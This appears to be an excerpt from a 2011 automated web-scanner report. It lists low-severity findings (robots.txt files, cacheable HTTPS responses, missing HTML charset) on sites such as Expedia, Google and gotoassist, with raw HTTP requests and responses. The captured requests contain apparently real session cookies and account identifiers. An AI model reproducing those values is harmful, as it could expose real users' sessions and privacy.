The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sutherlandglobal.com

Response

HTTP/1.1 200 OK
Content-Length: 27
Content-Type: text/plain
Last-Modified: Wed, 23 Mar 2011 15:03:59 GMT
Accept-Ranges: bytes
ETag: "e571f4896be9cb1:3aad"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 21:55:20 GMT
Connection: close

User-agent: *
Allow: /

29.97. http://www.trpcweb.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.trpcweb.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.trpcweb.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 10 Dec 2008 19:12:20 GMT
Accept-Ranges: bytes
ETag: "0823739fb5ac91:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:37:02 GMT
Connection: close
Content-Length: 1651

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by
...[SNIP]...
30. Cacheable HTTPS response  previous  next
There are 15 instances of this issue:

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:

30.1. https://broker.gotoassist.com/javaScriptTester.tmpl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://broker.gotoassist.com
Path:   /javaScriptTester.tmpl

Request

GET /javaScriptTester.tmpl?SessionInfo=237918117:6229CD39A2E2A4C&Portal=lbmc&enabled=true&screenWidth=1920&screenHeight=1156&windowWidth=1066&windowHeight=925&javaEnabled=false HTTP/1.1
Host: broker.gotoassist.com
Connection: keep-alive
Referer: https://broker.gotoassist.com/h/lbmc?Portal=lbmc&Target=ds%2FqueryPost.flow&Template=ds%2FphoneModeRedemption.tmpl&JavaScript=true&Form=lbmcSmartPage&Name_Full=&CompanyName=&Question=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dtsSession=SessionInfo%3D237918117%253A6229CD39A2E2A4C

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:43:54 GMT
Server: Apache
Content-Length: 3
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1

OK
30.2. https://events.gsmiweb.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://events.gsmiweb.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: events.gsmiweb.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=246713051.1303999551.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246713051.480784472.1303999551.1303999551.1303999551.1; PHPSESSID=n1ninf9mvtgucavvk20tlpt8n1

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 21:38:49 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 22 Nov 2010 07:29:07 GMT
ETag: "d81144-9f6-361c36c0"
Accept-Ranges: bytes
Content-Length: 2550
Connection: close
Content-Type: text/plain

..............h...&......... .h.......(....... ...................................4/..B=..OK..]Y..jg..xu..............................'"..S.k.i.n.s.\.N.e.w. .l.o.g.o.\.w.o.r.k. .P.L.E.S.K.\.i.c.o.\._.
...[SNIP]...
30.3. https://mosaicsecurity.com/products/1919-pci-scan-annual  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mosaicsecurity.com
Path:   /products/1919-pci-scan-annual

Request

GET /products/1919-pci-scan-annual HTTP/1.1
Host: mosaicsecurity.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.2
Strict-Transport-Security: max-age=31536000
ETag: "e65d65d16df32bda93928296ee041e60"
Cache-Control: max-age=0, private, must-revalidate
X-UA-Compatible: IE=Edge,chrome=1
Set-Cookie: _mosaic_secure_session=BAh7B0kiD3Nlc3Npb25faWQGOgZFRiIlZGEyYzY1ODVkOWIwYzE2YjI1ZmQ2ZGJiZTNkMWM0ODRJIhBfY3NyZl90b2tlbgY7AEZJIjF5ZTdRVnRDKzh2cVJKNWJVellUSEorSDAxMHRjYndyMzJPcklMbUZBRTRJPQY7AEY%3D--eedc6cf89468d42842b46738353515c9084092d3; path=/; HttpOnly; secure
X-Runtime: 0.031145
Server: nginx/0.8.53 + Phusion Passenger 3.0.2 (mod_rails/mod_rack)
Content-Length: 13341

<!DOCTYPE html>
<html>
<head>
<title>PCI Scan Annual Software Guide | Mosaic Security Research</title>
<meta name="description" content="Mosaic Security is an independent online buyer...s guide fo
...[SNIP]...
30.4. https://seals.networksolutions.com/siteseal_seek/siteseal  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://seals.networksolutions.com
Path:   /siteseal_seek/siteseal

Request

GET /siteseal_seek/siteseal?v_shortname=NETEV&v_querytype=W&v_search=www.clone-systems.com&x=5&y=5 HTTP/1.1
Host: seals.networksolutions.com
Connection: keep-alive
Referer: https://www.clone-systems.com/ecommerce/login.php?action=send_password_email
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:16:25 GMT
Server: Apache
Last-Modified: Sat, 07 May 2011 01:16:25 GMT
Expires: Sat, 07 May 2011 01:17:25 GMT
Content-Length: 2696
Keep-Alive: timeout=1, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Site
...[SNIP]...
30.5. https://secure.opinionlab.com/ccc01/comment_card.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.opinionlab.com
Path:   /ccc01/comment_card.asp

Request

GET /ccc01/comment_card.asp?time1=1304753251678&time2=1304754493643&prev=http%3A%2F%2Fburp%2Fshow%2F19&referer=http%3A%2F%2Fwww%2Eexpedia%2Ecom%2FHTX%5FFLTFLEX%5FCALENDAR%2Ehtml&height=1200&width=1920&custom_var=80312807C795402E93C5016D2A2A3E1B| HTTP/1.1
Host: secure.opinionlab.com
Connection: keep-alive
Referer: http://www.expedia.com/pub/agent.dll?qscr=flex&subm=1&city=AUS&citd=DTW&date1=&mnth=5/1/2011&rgst=1&rged=10&fxst=0&load=1&cAdu=1&rfrr=-429
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sat, 07 May 2011 02:48:21 GMT
Content-Type: text/html; Charset=UTF-8
Cool01: Opinionlab - Cool01
Set-Cookie: ASPSESSIONIDQCRBQCAC=NDNBDONBCBPKEFFJPEOEPEHB; path=/
Vary: Accept-Encoding
Content-Length: 8271

<!--TEMPLATE version 3.6 UNIVERSAL CSS: 0 ...--><html>
<head>
<META http-equiv="Content-Type" content="text/html; charset=UTF-16">
<base href="https://secure.opinionlab.com/ccc01">
<title>Comment
...[SNIP]...
30.6. https://subscribe.haymarketmedia.com/scm/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://subscribe.haymarketmedia.com
Path:   /scm/

Request

GET /scm/?form= HTTP/1.1
Host: subscribe.haymarketmedia.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=y3mspj55lrmqru55pqpftdmj; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 21:49:16 GMT
Content-Length: 5394


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><link href="Pubs/SC
...[SNIP]...
30.7. https://subscribe.haymarketmedia.com/subscribe/CCI_Custserve.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://subscribe.haymarketmedia.com
Path:   /subscribe/CCI_Custserve.aspx

Request

GET /subscribe/CCI_Custserve.aspx HTTP/1.1
Host: subscribe.haymarketmedia.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=lvsr30zwf1fkw5aao1zymfq2

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 21:49:27 GMT
Content-Length: 8523


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Haymarket
...[SNIP]...
30.8. https://www.expedia.com/pub/agent.dll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.expedia.com
Path:   /pub/agent.dll

Request

GET /pub/agent.dll?qscr=fbak&&zz=1247500409281&&zz=1304739644741 HTTP/1.1
Host: www.expedia.com
Connection: keep-alive
Referer: http://www.expedia.com/pub/agent.dll?qscr=fbak&&zz=1247500409281
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; jscript=1; srvys=v.1%2C2%2C0; p1=`tpid=v.1,1`accttype=v.2,3,1,EX01833E44F8$E8$24$DD$0C$AB$A2$18$37$25$18$F1$B6$8Ak$16$E6$24i$5B$39$8B$91H`linfo=v.4,|0|0|255|1|0||||||||0|0|0||0|0|0|-1|-1`airp=v.1,AUS`gacct=v.1,1,215819496`188; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dexpedia1%253D%252526pid%25253DFAQ%25252520Support%2525253ASearch%25252520Results%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.expedia.com/pub/agent.dll%2525253Fqscr%2525253Dfbak%25252526%25252526zz%2525253D1247500409281%252526ot%25253DA%2526undefinedtoJSONString%252CtoJSONString%253Dfunction%252520%252528%252529%25257Bvar%252520a%25253D%25255B%252522%25257B%252522%25255D%25252Cb%25252Ck%25252Cv%25253Bfunction%252520p%252528s%252529%25257Bif%252528b%252529%25257Ba.push%252528%252522%25252C%252522%252529%25253B%25257D%25250Aa.push%252528k.toJSONString%252528%252529%25252C%252522%25253A%252522%25252Cs%252529%25253Bb%25253Dtrue%25253B%25257D%25250Afor%252528k%252520in%252520this%252529%25257Bif%252528this.hasOwnProperty%252528k%252529%252529%25257Bv%25253Dthis%25255Bk%25255D%25253Bswitch%252528typeof%252520v%252529%25257Bcase%252522object%252522%25253Aif%252528v%252529%25257Bif%252528typeof%252520v.toJSONString%25253D%25253D%25253D%252522function%252522%252529%25257Bp%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257Delse%25257Bp%252528%252522null%252522%252529%25253B%25257D%25250Abreak%25253Bcase%252522string%252522%25253Acase%252522number%252522%25253Acase%252522boolean%252522%25253Ap%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257D%25257D%25250Aa.push%252528%252522%25257D%252522%252529%25253Breturn%252520a.join%252528%252522%252522%252529%25253B%25257D%3B; s1=`user=v.8,0,EX01CC562A07$F4$B5203000g$27$E96$32i$A00$32i$A00$32i$A001000$31000$1E310$2302!50K$A9$11$90$F1$8C$A5$D1$82$AB$89$FB!e02000`133

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Fri, 06 May 2011 22:40:52 GMT
Connection: keep-alive
Connection: Transfer-Encoding
Set-Cookie: s1=`user=v.8,0,EX0183E3F010$F4$B5204000k$27$E96$32i$A00$32i$A00$32i$A001000$31000$1E310$2302!50$83$A7rJ$D3$B5$CD3$82$AB$89$FB!e02000`129; Domain=.expedia.com; path=/
Set-Cookie: p1=`tpid=v.1,1`accttype=v.2,3,1,EX01833E44F8$E8$24$DD$0C$AB$A2$18$37$25$18$F1$B6$8Ak$16$E6$24i$5B$39$8B$91H`airp=v.1,AUS`gacct=v.1,1,215819496`linfo=v.4,|0|0|255|1|0||||||||0|0|0||0|0|0|-1|-1`188; expires=Sunday, 31-Dec-2016 23:59:59 GMT; Domain=.expedia.com; path=/
Content-Length: 155628


                                                                           <META HTTP-EQUIV="Content-Type" content="text/html; c
...[SNIP]...
30.9. https://www.expedia.com/pubspec/scripts/isE3OnHtx.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.expedia.com
Path:   /pubspec/scripts/isE3OnHtx.asp

Request

GET /pubspec/scripts/isE3OnHtx.asp HTTP/1.1
Host: www.expedia.com
Connection: keep-alive
Referer: https://www.expedia.com/pub/agent.dll
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; jscript=1; srvys=v.1%2C2%2C0; iEAPID=000,; JSESSION=cd179693-3938-4927-a337-d893911cc853; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dexpedia1%253D%252526pid%25253DHTX_LOGIN%252526pidt%25253D1%252526oid%25253Djavascript%2525253AISULGuest%25252528%25252529%252526ot%25253DA%2526undefinedtoJSONString%252CtoJSONString%253Dfunction%252520%252528%252529%25257Bvar%252520a%25253D%25255B%252522%25257B%252522%25255D%25252Cb%25252Ck%25252Cv%25253Bfunction%252520p%252528s%252529%25257Bif%252528b%252529%25257Ba.push%252528%252522%25252C%252522%252529%25253B%25257D%25250Aa.push%252528k.toJSONString%252528%252529%25252C%252522%25253A%252522%25252Cs%252529%25253Bb%25253Dtrue%25253B%25257D%25250Afor%252528k%252520in%252520this%252529%25257Bif%252528this.hasOwnProperty%252528k%252529%252529%25257Bv%25253Dthis%25255Bk%25255D%25253Bswitch%252528typeof%252520v%252529%25257Bcase%252522object%252522%25253Aif%252528v%252529%25257Bif%252528typeof%252520v.toJSONString%25253D%25253D%25253D%252522function%252522%252529%25257Bp%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257Delse%25257Bp%252528%252522null%252522%252529%25253B%25257D%25250Abreak%25253Bcase%252522string%252522%25253Acase%252522number%252522%25253Acase%252522boolean%252522%25253Ap%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257D%25257D%25250Aa.push%252528%252522%25257D%252522%252529%25253Breturn%252520a.join%252528%252522%252522%252529%25253B%25257D%3B; s1=`0`user=v.8,0,EX019BC74F84p$B7202000$84$27$E96$B8$60$9D$0D$B8$60$9D$0D$B8$60$9D$0D10001000$1E810$2302!50$94$FF$C5o$B2$E2$9D$21$D6$EF$B2u!e02000`minfo=v.5,EX01068F4DDA$F0$24$DD$0C$3E$0C$2F$1E$C5mR$39$18$13mj$26X$82$16u$F6$EC$5F$9E$C2$5C$C2$27$34$5B$7D$FC$35$F4$0D$2C$8E$21E6L$A4RS$B1$CF9`accttype=v.2,8,1,EX01191EC1D2$F0$24$DD$0C$23$0C$37$1E$CDmZ$39$19$14m$60$26X$83$17$7C$F4$DE$5F$9E`383; p1=`gacct=v.1,1,215819496`tpid=v.1,1`linfo=v.4,Guest|0|0|255|1|0||||||||0|0|0||0|0|0|-1|-1`group=v.1,0`99

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Content-Length: 18
Content-Type: text/html
Cache-Control: private
Vary: Accept-Encoding
Date: Fri, 06 May 2011 22:44:27 GMT
Connection: keep-alive

var isE3On = true;
30.10. https://www.fiddler2.com/dl/Fiddler2BetaSetup.exe  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.fiddler2.com
Path:   /dl/Fiddler2BetaSetup.exe

Request

GET /dl/Fiddler2BetaSetup.exe HTTP/1.1
Host: www.fiddler2.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 648312
Content-Type: application/octet-stream
Content-Location: https://www.fiddler2.com/dl/Fiddler2BetaSetup.exe
Last-Modified: Mon, 02 May 2011 16:20:16 GMT
Accept-Ranges: bytes
ETag: "821c7cd2e48cc1:243"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 00:33:03 GMT

MZ......................@.............................................    .!..L.!This program cannot be run in DOS mode.
$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i..i...it..iRichu..i........
...[SNIP]...
30.11. https://www.google.com/searchdomaincheck  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.google.com
Path:   /searchdomaincheck

Request

GET /searchdomaincheck?format=domain&type=chrome HTTP/1.1
Host: www.google.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NID=46=OWH5Day_z-dvNKz2zUPZ66bscqIQiXCwXcDUm788v-iY-VVDvGxPmnsbAFwU7P_idDvVtkqQwa_yvFS_xH-pHPbTamh5YBpBZYNPycAcjuWO2VSpk71uhgayNx6KcbrM; PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:FF=0:TM=1303071569:LM=1304695017:GM=1:S=TtNIJs_fkMoJMWwR

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 17:19:44 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/plain; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 11

.google.com
30.12. https://www.mavitunasecurity.com/support/checkupdate/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.mavitunasecurity.com
Path:   /support/checkupdate/

Request

GET /support/checkupdate/ HTTP/1.1
Host: www.mavitunasecurity.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 17:18:56 GMT

0.0.0.0
30.13. https://www.mavitunasecurity.com/welcome/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.mavitunasecurity.com
Path:   /welcome/

Request

GET /welcome/?v=1.9.0.5 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Host: www.mavitunasecurity.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 2451
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 17:11:13 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   
<head>
<link rel="styl
...[SNIP]...
30.14. https://www.taxnotebook.com/CopyRightTN.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.taxnotebook.com
Path:   /CopyRightTN.htm

Request

GET /CopyRightTN.htm HTTP/1.1
Host: www.taxnotebook.com
Connection: keep-alive
Referer: https://www.taxnotebook.com/Login/ChangePwd.aspx?AccNo=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SessionStateGUID=d3f0c14d-633a-5811-67ba-46ed879ceb86

Response

HTTP/1.1 200 OK
Content-Length: 632
Content-Type: text/html
Last-Modified: Mon, 11 Oct 2010 16:26:04 GMT
Accept-Ranges: bytes
ETag: "036d3ff6069cb1:252"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:50:51 GMT

<html>
<head>
<title>Tax Notebook Copyright</title>
</head>
<body>
<table height="120" width="100%" border="0" cellspacing="5">
<tr><td colspan="2" align=center><font face="Arial, Helvetica, san
...[SNIP]...
30.15. https://www.trust-guard.com/Templates/New-Green/Images/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.trust-guard.com
Path:   /Templates/New-Green/Images/favicon.ico

Request

GET /Templates/New-Green/Images/favicon.ico HTTP/1.1
Host: www.trust-guard.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=147269874.1303748966.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=9t7seirvsb0c34pngfqn7mcun3; __utma=147269874.1166530582.1303748966.1303758698.1304747384.3; __utmc=147269874; __utmb=147269874.1.10.1304747384

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 00:49:46 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sat, 29 Jan 2011 00:31:45 GMT
ETag: "42686d9-47e-49af14eb31e40"
Accept-Ranges: bytes
Content-Length: 1150
Connection: close
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... .....................................................III.AAA.................................................www.#"#.Ks:.Hn6.....UUU...............................
...[SNIP]...
31. HTML does not specify charset  previous  next
There are 72 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

31.1. https://events.gsmiweb.com/css/gsmi_events.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://events.gsmiweb.com
Path:   /css/gsmi_events.css

Request

GET /css/gsmi_events.css HTTP/1.1
Host: events.gsmiweb.com
Connection: keep-alive
Referer: https://events.gsmiweb.com/subscribe.php?event_id=82
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=246713051.1303999551.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246713051.480784472.1303999551.1303999551.1303999551.1; PHPSESSID=n1ninf9mvtgucavvk20tlpt8n1

Response

HTTP/1.1 404 Not Found
Date: Fri, 06 May 2011 21:39:04 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 31 Aug 2009 08:01:11 GMT
ETag: "d8064c-3bd-6fe21fc0"
Accept-Ranges: bytes
Content-Length: 957
Connection: close
Content-Type: text/html

<HTML>
<HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD>
<BODY>
<H1>Not Found</H1>
The requested document was not found on this server.
<P>
<HR>
<ADDRESS>
Web Server at gsmiweb.com
</ADDRESS>
</BODY>
</HTML
...[SNIP]...
31.2. https://events.gsmiweb.com/events.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://events.gsmiweb.com
Path:   /events.php

Request

GET /events.php HTTP/1.1
Host: events.gsmiweb.com
Connection: keep-alive
Referer: https://events.gsmiweb.com/subscribe.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
